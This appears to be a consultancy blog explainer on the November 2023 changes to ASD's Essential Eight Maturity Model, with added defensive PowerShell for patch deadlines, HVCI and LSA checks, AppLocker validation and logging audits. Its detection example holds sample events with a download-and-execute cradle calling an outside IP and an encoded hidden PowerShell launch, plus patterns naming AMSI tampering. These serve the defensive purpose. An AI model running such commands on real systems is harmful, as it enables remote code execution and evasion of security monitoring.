The Australian Signals Directorate (ASD) continuously updates the Essential Eight Maturity Model to help organisations, both government and private, keep pace with an ever-changing threat landscape and the evolving priorities, exploits and strategies of threat actors. The Essential Eight uses a risk-based approach, defining a minimum set of preventative and mitigation strategies that can be implemented and assessed at specific Maturity Levels (ML). Although designed to protect Microsoft Windows-based internet-connected networks, the framework can also be applied to non-Windows systems such as Linux, enterprise mobility systems and cloud services. It is worth noting, however, that some specific mitigation strategies will not be applicable to non-Windows systems.

The origins of the Essential Eight Maturity Model date back to February 2010, when ASD first published its mitigation strategies. The February 2017 update, Strategies to Mitigate Cyber Security Incidents, defined 37 strategies with varying degrees of “Relative Security Effectiveness”. Of these 37 strategies, eight were deemed “Essential” and became the now well-known “Essential Eight”.

The Essential Eight Maturity Model is designed to be implemented as an iterative process: an organisation must meet each Maturity Level in full before progressing to the next. Organisations should identify and plan for a target Maturity Level commensurate with their environment and risk appetite, or as otherwise required by policy, legislation or specific regulations.

The November 2023 update to the Essential Eight Maturity Model has seen ASD adopt the language of the mapped controls in the Information Security Manual (ISM). This gives consistency between the two frameworks and allows governance, compliance and reporting tools to ingest the Essential Eight controls directly for tracking and reporting.

The Essential Eight Maturity Model and the latest updates are as follows:

1. Patch Applications: Ensuring applications have the latest security updates installed.

Threat actors are becoming savvier. When an application vulnerability and its patch become public knowledge, it creates the perfect conditions for threat actors to opportunistically seek out and exploit individuals, organisations and systems that remain unpatched. A number of key changes to the Patch Applications control have been introduced to combat these opportunistic attacks, creating a proactive and well-structured approach to application patch management.

Maturity Level One:

Changes:

  • 48-hour response timeframes for addressing vulnerabilities in online services from being applicable only when exploits for vulnerabilities exist to when either vulnerabilities are assessed as critical by vendors or working exploits exist.
  • Conducting vulnerability scanning activities for high-risk software from at least fortnightly to at least weekly.
  • Patching vulnerabilities in high-risk software from within one month to within two weeks.

Maturity Level Two:

Changes: 48-hour response timeframes for addressing vulnerabilities in online services from being applicable only when exploits for vulnerabilities exist to when either vulnerabilities are assessed as critical by vendors or working exploits exist.

Maturity Level Three:

Changes: 48-hour response timeframes for addressing vulnerabilities in online services from being applicable only when exploits for vulnerabilities exist to when either vulnerabilities are assessed as critical by vendors or working exploits exist.

2. Patch Operating Systems: Ensuring operating systems have the latest security updates installed.

Vulnerabilities in operating systems often have public exploits that are easily accessible to low-sophistication threat actors, and can cause catastrophic damage in the hands of motivated threat actors with a more refined toolset and skill set. ASD has recognised the need for a consistent approach to applying operating system patches, or compensating controls where a patch cannot be applied, within a reasonable timeframe. The changes to the Patch Operating Systems control tighten the 48-hour rule for internet-facing systems while relaxing the scanning and patching timeframes for workstations and non-internet-facing systems at Maturity Levels Two and Three.

Maturity Level One:

Changes: 48-hour response timeframes for addressing vulnerabilities in operating systems of internet-facing servers and internet-facing network devices from being applicable only when exploits for vulnerabilities exist to when either vulnerabilities are assessed as critical by vendors or working exploits exist.

Maturity Level Two:

Changes:

  • 48-hour response timeframes for addressing vulnerabilities in operating systems of internet-facing servers and internet-facing network devices from being applicable only when exploits for vulnerabilities exist to when either vulnerabilities are assessed as critical by vendors or working exploits exist.
  • Conducting vulnerability scanning activities for operating systems of workstations, non-internet-facing servers and non-internet-facing network devices from at least weekly to at least fortnightly.
  • Patching vulnerabilities in operating systems of workstations, non-internet-facing servers and non-internet-facing network devices from within two weeks to within one month.

Maturity Level Three:

Changes:

  • 48-hour response timeframes for addressing vulnerabilities in operating systems of internet-facing servers and internet-facing network devices from being applicable only when exploits for vulnerabilities exist to when either vulnerabilities are assessed as critical by vendors or working exploits exist.
  • Conducting vulnerability scanning activities for operating systems of workstations, non-internet-facing servers and non-internet-facing network devices from at least weekly to at least fortnightly.
  • Patching vulnerabilities in operating systems of workstations, non-internet-facing servers and non-internet-facing network devices from within two weeks to within one month.

Additions:

  • Vulnerability scanner be used at least fortnightly to identify missing patches or updates for vulnerabilities in drivers.
  • Vulnerability scanner be used at least fortnightly to identify missing patches or updates for vulnerabilities in firmware.
  • Patches, updates or other vendor mitigations for vulnerabilities in drivers be applied within 48 hours of release when vulnerabilities are assessed as critical by vendors or when working exploits exist.
  • Patches, updates or other vendor mitigations for vulnerabilities in drivers be applied within one month of release when vulnerabilities are assessed as non-critical by vendors and no working exploits exist.
  • Patches, updates or other vendor mitigations for vulnerabilities in firmware be applied within 48 hours of release when vulnerabilities are assessed as critical by vendors or when working exploits exist.
  • Patches, updates or other vendor mitigations for vulnerabilities in firmware be applied within one month of release when vulnerabilities are assessed as non-critical by vendors and no working exploits exist.
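
The timeframes in the Patch Applications and Patch Operating Systems sections above share one rule: the 48-hour clock now starts when the vendor rates a vulnerability critical or a working exploit exists, but only for online services, internet-facing servers and network devices, and (at Maturity Level Three) drivers and firmware. The following PowerShell is an added example, not ASD's or the original article's code. It encodes those windows as a deadline calculator and runs it over constructed scan findings to flag overdue items. The two-week non-critical window for online services and internet-facing systems is an assumption here and should be confirmed against the current ASD publication; “one month” is approximated as 30 days.

```powershell
function Get-PatchWindow {
    param(
        [Parameter(Mandatory)]
        [ValidateSet('OnlineService', 'InternetFacingOS', 'HighRiskSoftware',
                     'OtherApplication', 'InternalOS', 'Driver', 'Firmware')]
        [string]$AssetClass,
        [bool]$VendorCritical = $false,
        [bool]$WorkingExploit = $false
    )
    # Post-November-2023 trigger: the 48-hour clock starts when EITHER the vendor
    # rates the vulnerability critical OR a working exploit exists (previously exploit-only).
    $urgent = $VendorCritical -or $WorkingExploit
    switch ($AssetClass) {
        { $_ -in 'OnlineService', 'InternetFacingOS' } {
            if ($urgent) { return New-TimeSpan -Hours 48 }
            return New-TimeSpan -Days 14   # non-critical window: assumed two weeks, confirm against ASD
        }
        { $_ -in 'Driver', 'Firmware' } {   # Maturity Level Three additions
            if ($urgent) { return New-TimeSpan -Hours 48 }
            return New-TimeSpan -Days 30   # "one month", approximated as 30 days
        }
        'HighRiskSoftware' { return New-TimeSpan -Days 14 }  # browsers, office suites, email, PDF, security products
        default            { return New-TimeSpan -Days 30 }  # other applications, workstation and internal OS
    }
}

function Test-PatchCompliance {
    param(
        [Parameter(Mandatory)][object[]]$Findings,
        [datetime]$AsOf = (Get-Date)
    )
    foreach ($f in $Findings) {
        $window   = Get-PatchWindow -AssetClass $f.AssetClass `
                        -VendorCritical $f.VendorCritical -WorkingExploit $f.WorkingExploit
        $deadline = $f.Released + $window
        $status = if ($f.Patched) {
                      if ($f.Patched -le $deadline) { 'Compliant' } else { 'PatchedLate' }
                  } elseif ($AsOf -gt $deadline) { 'Overdue' } else { 'Open' }
        [pscustomobject]@{
            Asset    = $f.Asset
            Class    = $f.AssetClass
            Window   = $window
            Deadline = $deadline
            Status   = $status
        }
    }
}

# Constructed sample findings (not real scanner output); dates are arbitrary.
$asOf = [datetime]'2024-03-10'
$findings = @(
    [pscustomobject]@{ Asset='web-portal';    AssetClass='OnlineService';    Released=[datetime]'2024-03-01'; VendorCritical=$true;  WorkingExploit=$false; Patched=$null }
    [pscustomobject]@{ Asset='vpn-gw';        AssetClass='InternetFacingOS'; Released=[datetime]'2024-03-08'; VendorCritical=$false; WorkingExploit=$true;  Patched=[datetime]'2024-03-09' }
    [pscustomobject]@{ Asset='browser-fleet'; AssetClass='HighRiskSoftware'; Released=[datetime]'2024-02-20'; VendorCritical=$false; WorkingExploit=$false; Patched=$null }
    [pscustomobject]@{ Asset='ws-0042 OS';    AssetClass='InternalOS';       Released=[datetime]'2024-02-25'; VendorCritical=$true;  WorkingExploit=$false; Patched=$null }
)

Test-PatchCompliance -Findings $findings -AsOf $asOf | Format-Table -AutoSize
```

On the constructed data the web portal (vendor-critical, no exploit) is already overdue under the new trigger, the VPN gateway patched within its 48 hours is compliant, the browser fleet has blown its two-week window, and the vendor-critical workstation OS vulnerability is still open because workstations carry a one-month window rather than the 48-hour rule. Feed real findings in with the same property names to use it against scanner exports.
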

3. Multi-Factor Authentication: Ensuring that multiple methods of authentication are provided to restrict unauthorised access.

Multi-factor authentication (MFA) is one of the most effective controls to prevent threat actors from gaining access to an application, service or system. Implemented effectively, MFA makes it exceptionally difficult for threat actors to use stolen credentials and progress along the cyber kill chain.

MFA requires use of two or more different methods of authentication:

  • Something the user knows (e.g., a password)
  • Something the user has (e.g., a security token or smartphone)
  • Something the user is (e.g., fingerprint or facial recognition)

At Maturity Levels Two and Three, MFA must now be phishing-resistant, for example security keys, smart cards, passkeys or FIDO2 (Fast Identity Online) authenticators, which also enable password-less authentication. Note that biometrics such as fingerprints are not accepted as a factor on their own; they count only when used to unlock another factor, such as a one-time password (OTP) generator app or passkey on a smartphone. This is the “something users have that is unlocked by something users know or are” wording added to the model.

Maturity Level One:

Changes: Removing the caveat that customers of online customer services that process, store or communicate sensitive customer data can easily opt-out of using multi-factor authentication.

Additions: Multi-factor authentication uses either: something users have and something users know, or something users have that is unlocked by something users know or are.

Maturity Level Two:

Changes:

  • Removing the caveat that customers of online customer services that process, store or communicate sensitive customer data can easily opt-out of using multi-factor authentication.
  • Event log storage from local logging to centralised logging.

Additions:

  • Multi-factor authentication be used to authenticate unprivileged users of systems to their devices.
  • Multi-factor authentication used for authenticating users of online services be phishing-resistant.
  • Multi-factor authentication used for authenticating customers of online customer services provide a phishing-resistant option.
  • Multi-factor authentication used for authenticating users of systems to their devices be phishing-resistant.
  • Event logs are protected from unauthorised modification and deletion.
  • Event logs for internet-facing servers are monitored for signs of compromise.
  • Cyber security incidents are reported to both an organisation’s CISO and ASD.
  • Cyber security incident response plans are enacted in response to cyber security incidents.

Maturity Level Three:

Changes:

  • Removing the caveat that customers of online customer services that process, store or communicate sensitive customer data can easily opt-out of using multi-factor authentication.
  • The implementation of multi-factor authentication from important data repositories to all data repositories, with prioritisation of important data repositories being encouraged.

Additions: Multi-factor authentication be used to authenticate unprivileged users of systems to their devices.

4. Restrict Administrative Privileges: Minimising the number of people able to effect controls.

The principles of ‘Least Privilege’ and ‘Need to Know’ are applied more consistently across the processes for granting, controlling and rescinding privileged access to applications and systems. Recommendations include limiting internet access to only those privileged accounts explicitly authorised to have it, and ensuring that break glass credentials are long, unique, unpredictable and managed. ASD also recommends that event logs are monitored and protected from unauthorised modification and deletion.

Maturity Level One:

Changes: The types of privileged accounts that can access the internet from only privileged service accounts to all privileged accounts explicitly authorised to do so.

Additions:

  • Requests for privileged access to data repositories are validated when first requested.
  • Privileged accounts that have been explicitly authorised to access the internet are strictly limited to only what is required for users and services to undertake their duties.

Maturity Level Two:

Changes:

  • The types of privileged accounts that can access the internet from only privileged service accounts to all privileged accounts explicitly authorised to do so.

Additions:

  • Requests for privileged access to data repositories are validated when first requested.
  • Privileged access to data repositories is disabled after 12 months unless revalidated.
  • Privileged accounts that have been explicitly authorised to access the internet are strictly limited to only what is required for users and services to undertake their duties.
  • Credentials for break glass accounts are long, unique, unpredictable and managed.
  • Event logs are protected from unauthorised modification and deletion.
  • Event logs for internet-facing servers are monitored for signs of compromise.
  • Cyber security incidents are reported to both an organisation’s CISO and ASD.
  • Cyber security incident response plans are enacted in response to cyber security incidents.

Maturity Level Three:

Changes: The types of privileged accounts that can access the internet from no privileged accounts to all privileged accounts explicitly authorised to do so.

Additions:

  • Requests for privileged access to data repositories are validated when first requested.
  • Privileged access to data repositories are disabled after 12 months unless revalidated.
  • Privileged access to data repositories are limited to only what is required for users and services to undertake their duties.
  • Privileged accounts that have been explicitly authorised to access the internet are strictly limited to only what is required for users and services to undertake their duties.
  • Secure Admin Workstations are used in the performance of administrative activities.
  • Credentials for break glass accounts are long, unique, unpredictable and managed.
  • Microsoft Windows’ memory integrity functionality be enabled.
  • Microsoft Windows’ Local Security Authority (LSA) protection functionality be enabled.
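
The last two Maturity Level Three additions are Windows settings that can be verified and enabled from an elevated PowerShell session. The following is an added example, not ASD's or the original article's code. It reads the running state from the Win32_DeviceGuard CIM class (not just the configured registry value) and the LSA RunAsPPL value, and offers a ShouldProcess-aware function to enable both; the registry paths are the standard Windows locations for these features.

```powershell
function Get-MemoryIntegrityState {
    # Win32_DeviceGuard reports what is actually running, not only what is configured.
    # SecurityServicesRunning: 1 = Credential Guard, 2 = HVCI (memory integrity).
    $dg  = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' -ClassName Win32_DeviceGuard
    $cfg = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity' `
               -Name Enabled -ErrorAction SilentlyContinue
    [pscustomobject]@{
        Control    = 'Memory integrity (HVCI)'
        Configured = ($cfg.Enabled -eq 1)
        Running    = ($dg.SecurityServicesRunning -contains 2)
    }
}

function Get-LsaProtectionState {
    # RunAsPPL = 1 (UEFI-locked) or 2 (not UEFI-locked, newer builds) runs LSASS as a
    # protected process, so unprotected code such as credential dumpers cannot open it.
    $lsa = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' `
               -Name RunAsPPL -ErrorAction SilentlyContinue
    [pscustomobject]@{
        Control    = 'LSA protection (RunAsPPL)'
        Configured = ($lsa.RunAsPPL -in 1, 2)
        Running    = $null   # effective only after reboot; check the LSASS process or Event ID 12 in the LSA log
    }
}

function Enable-E8Ml3WindowsProtections {
    [CmdletBinding(SupportsShouldProcess)]
    param()
    $hvciKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity'
    if ($PSCmdlet.ShouldProcess($hvciKey, 'Enable memory integrity')) {
        New-Item -Path $hvciKey -Force | Out-Null
        Set-ItemProperty -Path $hvciKey -Name Enabled -Type DWord -Value 1
    }
    $lsaKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    if ($PSCmdlet.ShouldProcess($lsaKey, 'Enable LSA protection')) {
        Set-ItemProperty -Path $lsaKey -Name RunAsPPL -Type DWord -Value 1
    }
    Write-Warning 'Both settings take effect after a reboot. Pilot memory integrity first: incompatible (unsigned or legacy) drivers will fail to load.'
}

Get-MemoryIntegrityState
Get-LsaProtectionState
# Enable-E8Ml3WindowsProtections -WhatIf   # preview the changes; drop -WhatIf to apply
```

At fleet scale the same checks belong in your configuration management or EDR compliance queries rather than an interactive script, but the two data sources (the CIM class for what is running, the registry for what is configured) are the ones to query either way.
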

5. Application Control: Preventing unauthorised software from running on a system.

Applications have become part of daily life and are routinely downloaded to make day-to-day work simpler and more efficient. Without careful consideration of the risks, however, this creates opportunities for threat actors to run malicious scripts and executables on a system. ASD has strengthened the Application Control control by requiring Microsoft’s recommended application blocklist and at least annual validation of application control rulesets, alongside the existing expectations that applications are obtained from reputable sources and limited to those with a business need, so that unauthorised software cannot execute.

Maturity Level One:

Changes: The implementation of application control from using NTFS permissions to using an application control solution, either in-built for an operating system or an equivalent third-party vendor solution.

Maturity Level Two:

Changes: Event log storage from local logging to centralised logging.

Additions:

  • Microsoft’s recommended application blocklist be implemented.
  • Application control rulesets are validated at least annually.
  • Event logs are protected from unauthorised modification and deletion.
  • Event logs for internet-facing servers are monitored for signs of compromise.
  • Cyber security incidents are reported to both an organisation’s CISO and ASD.
  • Cyber security incident response plans are enacted in response to cyber security incidents.

Maturity Level Three:

No significant change.
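The annual ruleset validation added at Maturity Level Two is easy to state and easy to skip. The following PowerShell is an added example, not ASD's, Microsoft's or the original article's code, showing a practical starting point using the built-in AppLocker module: it tests whether anything found under user-writable locations would be allowed to run for a given user, and whether a handful of binaries from Microsoft's recommended block rules are actually denied. The user name, the directory list and the three binaries are placeholders; replace the latter with the full current Microsoft list. The module is only available on editions that ship AppLocker (Enterprise, Education and Server), and organisations using WDAC instead should run the equivalent check with the WDAC audit-mode events.

```powershell
function Test-UserWritablePaths {
    param(
        [string]$User = 'alice',   # placeholder account to evaluate the policy as
        [string[]]$Paths = @("$env:USERPROFILE\Downloads", $env:LOCALAPPDATA, $env:TEMP, 'C:\ProgramData')
    )
    $policy = Get-AppLockerPolicy -Effective
    if (-not $policy.RuleCollections) {
        Write-Warning 'No effective AppLocker policy: application control is not enforced by AppLocker on this host.'
        return
    }
    foreach ($p in ($Paths | Where-Object { Test-Path $_ })) {
        # Anything Allowed here is a file a standard user could drop and execute:
        # each hit is either a gap in the ruleset or an exception that needs a documented owner.
        Get-AppLockerFileInformation -Directory $p -Recurse -FileType Exe, Dll, Script -ErrorAction SilentlyContinue |
            Test-AppLockerPolicy -PolicyObject $policy -User $User -Filter Allowed |
            Select-Object FilePath, PolicyDecision, MatchingRule
    }
}

function Test-BlocklistEnforced {
    param([string]$User = 'alice')
    # Placeholder subset of binaries from Microsoft's recommended block rules; replace with
    # the full current list. Paths are filtered so the check still runs on builds lacking a binary.
    $candidates = @(
        "$env:SystemRoot\System32\mshta.exe",
        "$env:SystemRoot\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
        "$env:SystemRoot\System32\wbem\WMIC.exe"
    ) | Where-Object { Test-Path $_ }
    if (-not $candidates) { Write-Warning 'None of the candidate binaries exist on this host.'; return }
    $policy = Get-AppLockerPolicy -Effective
    Test-AppLockerPolicy -PolicyObject $policy -Path $candidates -User $User |
        Select-Object FilePath, PolicyDecision, MatchingRule
}

# Ruleset review: anything Allowed from a user-writable path, and any blocklisted
# binary that is still Allowed, goes on the list for the annual validation.
Test-UserWritablePaths   | Format-Table -AutoSize
Test-BlocklistEnforced   | Format-Table -AutoSize
```

Keep the output of each run with the review record; a diff between this year's and last year's results is the evidence an assessor will ask for when checking that rulesets are validated at least annually.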

6. Restrict Microsoft Office Macros: Ensuring that controls are in place to prevent unauthorised software from running through Office macros.

Macros are small programs that automate repetitive tasks in Office applications such as PowerPoint, Word and Excel. Threat actors have long used macros to steal sensitive information and deliver malware. The most notable changes to this control are the removal of the requirement to log macro execution and, at Maturity Level Three, the requirement that only macros carrying V3 digital signatures can be enabled. It is important to note that application control solutions do not govern macro execution, because macros run inside the already-allowed Microsoft Office processes rather than as separate executables; this control is needed in addition to Application Control.

Maturity Level One:

No significant change.

Maturity Level Two:

Changes: Removing the requirement for allowed and blocked Microsoft Office macro events to be logged.

Maturity Level Three:

Changes: Removing the requirement for allowed and blocked Microsoft Office macro events to be logged.

Additions:

  • Microsoft Office macros are checked to ensure they are free of malicious code before being digitally signed or placed within Trusted Locations.
  • Microsoft Office macros digitally signed by signatures other than V3 signatures are prevented from being enabled via the Message Bar or Backstage View.

7. User Application Hardening: Securing software applications to prevent the exploitation of vulnerabilities.

User Application Hardening is achieved by configuring the security settings of software such as web browsers and office productivity suites. Limiting the permissions and capabilities of applications significantly reduces an organisation’s attack surface. ASD recommends removing or disabling Internet Explorer 11 (IE11), as Microsoft ceased support for it on 15 June 2022 and threat actors continue to target its unpatched vulnerabilities. Other hardening recommendations include disabling PowerShell 2.0, implementing Attack Surface Reduction rules, and collecting event logs (including PowerShell and command-line process creation events) in a way that allows them to be monitored.

Maturity Level One:

Changes: Internet Explorer 11 from not processing content from the internet to being disabled or removed.

Maturity Level Two:

Changes:

  • Internet Explorer 11 from not processing content from the internet to being disabled or removed.
  • Hardening guidance from implementing ASD or vendor hardening guidance to implementing ASD and vendor hardening guidance, with the most restrictive requirements taking precedence when conflicts occur.
  • PowerShell event log collection from application control events associated with blocked PowerShell scripts to PowerShell module logging, script block logging and transcription events.
  • Event log storage from local logging to centralised logging.

Additions:

  • Logging of command line process creation events.
  • Event logs are protected from unauthorised modification and deletion.
  • Event logs for internet-facing servers are monitored for signs of compromise.
  • Cyber security incidents are reported to both an organisation’s CISO and ASD.
  • Cyber security incident response plans are enacted in response to cyber security incidents.

Maturity Level Three:

Changes:

  • Hardening guidance from implementing ASD or vendor hardening guidance to implementing ASD and vendor hardening guidance, with the most restrictive requirements taking precedence when conflicts occur.
  • PowerShell event log collection from application control events associated with blocked PowerShell scripts to PowerShell module logging, script block logging and transcription events.

Additions: Logging of command line process creation events.
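
The changes above move the PowerShell logging requirement from “blocked script events” to module logging, script block logging and transcription, and add command-line process creation events. The following PowerShell is an added example, not ASD's or the original article's code. Part one audits the corresponding Group Policy registry values and the two legacy optional features (PowerShell 2.0 and IE11); part two shows the kind of detection those logs make possible, run here over constructed sample events rather than a live event log. The patterns are illustrative and the host names, command lines and IP address are made up.

```powershell
$PolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

function Get-E8LoggingConfig {
    # Standard Group Policy registry locations for the logging settings.
    # Command-line capture in 4688 also needs the "Process Creation" audit
    # subcategory enabled (auditpol or Advanced Audit Policy).
    $checks = @(
        @{ Name = 'ScriptBlockLogging'; Path = "$PolicyRoot\ScriptBlockLogging"; Value = 'EnableScriptBlockLogging' },
        @{ Name = 'ModuleLogging';      Path = "$PolicyRoot\ModuleLogging";      Value = 'EnableModuleLogging' },
        @{ Name = 'Transcription';      Path = "$PolicyRoot\Transcription";      Value = 'EnableTranscripting' },
        @{ Name = 'ProcessCmdLine';     Path = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit'; Value = 'ProcessCreationIncludeCmdLine_Enabled' }
    )
    foreach ($c in $checks) {
        $v = (Get-ItemProperty -Path $c.Path -Name $c.Value -ErrorAction SilentlyContinue).($c.Value)
        [pscustomobject]@{ Control = $c.Name; Compliant = ($v -eq 1) }
    }
    # Legacy components that should be disabled or removed (requires elevation to query).
    foreach ($feature in 'MicrosoftWindowsPowerShellV2Root', 'Internet-Explorer-Optional-amd64') {
        $state = (Get-WindowsOptionalFeature -Online -FeatureName $feature -ErrorAction SilentlyContinue).State
        [pscustomobject]@{ Control = "$feature disabled/removed"; Compliant = ($state -ne 'Enabled') }
    }
}

function Find-SuspiciousPowerShell {
    param([Parameter(Mandatory)][object[]]$Events)   # objects with Id, Host, Message
    # Indicators that only become visible once 4104 (script block) and 4688 (process
    # creation with command line) events are collected centrally.
    $patterns = [ordered]@{
        EncodedCommand = '(?i)-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}'
        DownloadCradle = '(?i)(IEX|Invoke-Expression)[\s\S]*?(DownloadString|Net\.WebClient)|(DownloadString|Net\.WebClient)[\s\S]*?(IEX|Invoke-Expression)'
        PS2Downgrade   = '(?i)powershell(\.exe)?\s+.*-v(ersion)?\s+2(\.0)?\b'
        AmsiTamper     = '(?i)AmsiUtils|amsiInitFailed'
    }
    foreach ($e in $Events) {
        foreach ($p in $patterns.GetEnumerator()) {
            if ($e.Message -match $p.Value) {
                [pscustomobject]@{
                    EventId   = $e.Id
                    Host      = $e.Host
                    Indicator = $p.Key
                    Snippet   = $e.Message.Substring(0, [Math]::Min(70, $e.Message.Length))
                }
            }
        }
    }
}

# Constructed sample events (not real log data).
$sample = @(
    [pscustomobject]@{ Id = 4104; Host = 'ws-0042';   Message = 'IEX (New-Object Net.WebClient).DownloadString(''http://203.0.113.10/a.ps1'')' }
    [pscustomobject]@{ Id = 4688; Host = 'ws-0042';   Message = 'Process Command Line: powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA' }
    [pscustomobject]@{ Id = 4688; Host = 'srv-web01'; Message = 'Process Command Line: powershell.exe -version 2 -File C:\scripts\legacy.ps1' }
    [pscustomobject]@{ Id = 4104; Host = 'ws-0017';   Message = 'Get-ChildItem C:\Reports | Export-Csv .\index.csv' }
)

Get-E8LoggingConfig | Format-Table -AutoSize
Find-SuspiciousPowerShell -Events $sample | Format-Table -AutoSize

# Against a live host, replace $sample with something like:
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents 500 |
#     Select-Object Id, @{ n = 'Host'; e = { $_.MachineName } }, Message
```

Three of the four constructed events trip an indicator (the download cradle, the encoded command and the PowerShell 2.0 downgrade); the benign export to CSV does not. Note the downgrade case: if PowerShell 2.0 is still installed, the first two indicators would never reach the script block log because that engine does not produce 4104 events, which is why the feature check and the detection belong together.
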

8. Regular Backups: Ensuring the expedited recovery from incidents – namely ransomware/destructive attacks.

Backups are a critical component of an organisation’s Business Continuity Planning (BCP) and Disaster Recovery (DR) processes. Although there have been no significant changes to this control, ASD has emphasised that backups must be commensurate with business criticality and business continuity requirements, and that backups are routinely tested to verify that BCP and DR requirements can actually be met.

Maturity Level One:

No significant change.

Maturity Level Two:

No significant change.

Maturity Level Three:

No significant change.

So what next?

Cybersecurity is highly dynamic and requires a proactive and adaptive approach so that individuals and organisations keep pace with an evolving threat landscape. Continuous education, regular assessments, and a commitment to staying informed about the latest recommendations are essential to maintaining effective cybersecurity.

Assess: identify the gaps to uplift, prioritise them, and make sure you understand each control and how it applies to your environment.

Plan: keep the implementation pragmatic and workable for your business, but understand that some changes will alter existing ways of working.

Educate: make sure your teams are aware of what the changes mean for their day-to-day roles, functions and requirements.

Regular monitoring, proactive measures and a comprehensive security strategy will help you build a resilient cybersecurity posture. Build detection use cases from control violations, ensure there is optimal coverage, and confirm that business continuity and disaster recovery plans are robust.

And if you need help, work with experts such as AC3 to ensure you aren’t leaving your business exposed. They can often provide a broader perspective on how to implement the controls correctly and effectively, increasing both security and the value of your existing investments.